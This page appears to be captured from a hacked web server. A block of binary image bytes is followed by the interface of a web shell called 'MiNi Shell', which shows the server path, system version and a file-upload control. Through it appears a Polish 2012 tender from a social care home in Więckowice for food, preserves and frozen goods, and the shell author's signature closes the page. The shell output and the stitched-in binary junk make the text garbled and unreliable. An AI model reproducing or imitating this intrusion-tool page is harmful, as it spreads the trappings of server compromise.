JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/471770-N-2012.html

<p class="kh_header"><b>Bolechowice: Dostawy artykułów spożywczych, przetworów owocowych,warzywnych i mrożonek</b><br>
<b>Numer ogłoszenia: 471770 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Więckowice 1, 32-082 Bolechowice, woj. małopolskie, tel. 0-12 2851603, faks 0-12 2852010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpswieckowice</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych, przetworów owocowych,warzywnych i mrożonek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Andruty-wafle cukrzycowe kg-70
Budyń bez cukru  śmietankowykg-65
Budyń bez cukru  czekoladowy kg-65
Bulion drobiowy Winiary kg-10
Chrupki krakowskie szt.-230
Ciastka deserowe kg-100
Ciastka Grześki w czekoladzie szt-400
Ciastka herbatniki szkolne kg-190
Ciastka krakersy szt-80
Cukier kg. - 2500
Cukier puder kg-120
Cukier waniliowy kg-5
Cukierki w czekoladzie kg-20
Cynamon kg-1,5
Czekolada dla diabetyków szt.-50
Czosnek granulowany kg-15
Drożdże piekarskie kg-10
Galaretka owocowa kg-200
Herbata ekspres. owoc. op.-110
Herbata liściasta Madras kg-100
Kakao Wawel kg-18
Kasza gryczana prażona kg-150
Kasza jęczmienna 	kg-160
Kasza manna 	kg-225
Kawa zbożowa 	kg-120
Ketchup Roleski 	kg-150
Kisiel bez cukru     kg-110
Kleik ryżowy błyskawiczny szt.-20
Kminek kg-1
Konserwa rybna śledź w pomidorach kg-390
Konserwa rybna śledź w oleju kg-390
Kwasek cytrynowy 	kg-15
Liście laurowe        	kg-1,5
Majeranek             	kg-1,5
Majonez Roleski     	kg-330
Makaron drobny 4-ro jajeczny kg-150
Makaron nitki 4-ro jajeczny	kg-150
Makaron różny 4-ro jajeczny	kg-450
Makrela wędzona	kg-160
Mąka pszenna tortowa 	kg-2450
Mąka ziemniaczana  	kg-160
Miód naturalny wielokwiatowy kg-50
Musli kg-130
Musztarda kremowa Roleski kg-40
Ocet 10 %            	l-60
Olej Kujawski         	l-410
Paluszki słone Lajkonik 	szt.-	500
Pieprz czarny mielony 	kg-15
Płatki kukury. Corn Flakes bez dodatków kg-50                                             
Płatki kukury Corn Flakes  smakowe z dodatkami kg-90
Płatki owsiane kg-30
Proszek do pieczenia kg-2
Przyprawa do drobiu Kamis kg-3
Przyprawa do mięsa Kamis	kg-2
Przyprawa do potraw kg-75
Przyprawa w płynie do zup Winiary l-210
Rodzynki kg-22
Ryż kg-340
Sól kuchenna jodowana kg-630
Śledzie solone Matjas kg-210
Śmietanka śnieżka 	kg-25
Śliwki suszone bez pestek kg	-8
Wiórka kokosowe kg-10
Ziele angielskie kg-	3
Żelatyna spożywcza kg-35
Barszcz biały l-140
Barszcz czerwony Krakus l-600
Brzoskwinie w syropie szt.-20
Chrzan tarty Polonaise kg-115
Dżem niskosłodzony kg-360
Groszek konserwowy szt.-480
Koncentrat pomidorowy 30% Pudliszki kg-200
Kukurydza konserwowa szt.-550
Marmolada kg-5
Papryka konserwowa czerwona szt.-340
Pieczarki marynowane szt.-170
Sałatka szwedzka szt.-380
Sałatka z czerwonej kapusty	szt.-280
Sok 100 % Hortex  małe szt.-1100
Sok 100 % Hortex różne smaki a 1 l.L-1230
Sok syrop L-50
Borówki opak. do 2,5 ,kg-40
Brukselka mrożona kg-40
Fasola szparagowa mrożona żółta kg-150
Fasola szparagowa mrożona zielona kg	-100
Filet z mintaja mrożony kg-600
Groszek zielony mrożony kg-100
Kalafior mrożony kg-200
Lody wielosmakowe l-110
Mieszanka kompotowa mrożona kg-2400
Szpinak mrożony kg-180
Śliwy mroż. bez pestek kg-420
Truskawki mrożone kg-350.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.00.00-0, 15.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpswieckowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Więckowicach, ul. Słoneczna 3, 32-082 Bolechowice
i na stronie internetowej www.dpswieckowice.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 10:00, miejsce: Dom Pomocy Społecznej w Więckowicach, ul. Słoneczna 3, 32-082 Bolechowice
w pokoju Działu Administracyjno - Gospodarczego w paw.D.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy Artykułów Spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze
Andruty-wafle cukrzycowe kg-70
Budyń bez cukru  śmietankowykg-65
Budyń bez cukru  czekoladowy kg-65
Bulion drobiowy Winiary kg-10
Chrupki krakowskie szt.-230
Ciastka deserowe kg-100
Ciastka Grześki w czekoladzie szt-400
Ciastka herbatniki szkolne kg-190
Ciastka krakersy szt-80
Cukier kg. - 2500
Cukier puder kg-120
Cukier waniliowy kg-5
Cukierki w czekoladzie kg-20
Cynamon kg-1,5
Czekolada dla diabetyków szt.-50
Czosnek granulowany kg-15
Drożdże piekarskie kg-10
Galaretka owocowa kg-200
Herbata ekspres. owoc. op.-110
Herbata liściasta Madras kg-100
Kakao Wawel kg-18
Kasza gryczana prażona kg-150
Kasza jęczmienna 	kg-160
Kasza manna 	kg-225
Kawa zbożowa 	kg-120
Ketchup Roleski 	kg-150
Kisiel bez cukru     kg-110
Kleik ryżowy błyskawiczny szt.-20
Kminek kg-1
Konserwa rybna śledź w pomidorach kg-390
Konserwa rybna śledź w oleju kg-390
Kwasek cytrynowy 	kg-15
Liście laurowe        	kg-1,5
Majeranek             	kg-1,5
Majonez Roleski     	kg-330
Makaron drobny 4-ro jajeczny kg-150
Makaron nitki 4-ro jajeczny	kg-150
Makaron różny 4-ro jajeczny	kg-450
Makrela wędzona	kg-160
Mąka pszenna tortowa 	kg-2450
Mąka ziemniaczana  	kg-160
Miód naturalny wielokwiatowy kg-50
Musli kg-130
Musztarda kremowa Roleski kg-40
Ocet 10 %            	l-60
Olej Kujawski         	l-410
Paluszki słone Lajkonik 	szt.-	500
Pieprz czarny mielony 	kg-15
Płatki kukury. Corn Flakes bez dodatków kg-50                                             
Płatki kukury Corn Flakes  smakowe z dodatkami kg-90
Płatki owsiane kg-30
Proszek do pieczenia kg-2
Przyprawa do drobiu Kamis kg-3
Przyprawa do mięsa Kamis	kg-2
Przyprawa do potraw kg-75
Przyprawa w płynie do zup Winiary l-210
Rodzynki kg-22
Ryż kg-340
Sól kuchenna jodowana kg-630
Śledzie solone Matjas kg-210
Śmietanka śnieżka 	kg-25
Śliwki suszone bez pestek kg	-8
Wiórka kokosowe kg-10
Ziele angielskie kg-	3
Żelatyna spożywcza kg-35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy przetworów owocowych i warzywnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przetwory owocowo warzywne
Barszcz biały l-140
Barszcz czerwony Krakus l-600
Brzoskwinie w syropie szt.-20
Chrzan tarty Polonaise kg-115
Dżem niskosłodzony kg-360
Groszek konserwowy szt.-480
Koncentrat pomidorowy 30% Pudliszki kg-200
Kukurydza konserwowa szt.-550
Marmolada kg-5
Papryka konserwowa czerwona szt.-340
Pieczarki marynowane szt.-170
Sałatka szwedzka szt.-380
Sałatka z czerwonej kapusty	szt.-280
Sok 100 % Hortex  małe szt.-1100
Sok 100 % Hortex różne smaki a 1 l.L-1230
Sok syrop L-50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mrożonki :
Borówki opak. do 2,5 ,kg-40
Brukselka mrożona kg-40
Fasola szparagowa mrożona żółta kg-150
Fasola szparagowa mrożona zielona kg	-100
Filet z mintaja mrożony kg-600
Groszek zielony mrożony kg-100
Kalafior mrożony kg-200
Lody wielosmakowe l-110
Mieszanka kompotowa mrożona kg-2400
Szpinak mrożony kg-180
Śliwy mroż. bez pestek kg-420
Truskawki mrożone kg-350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com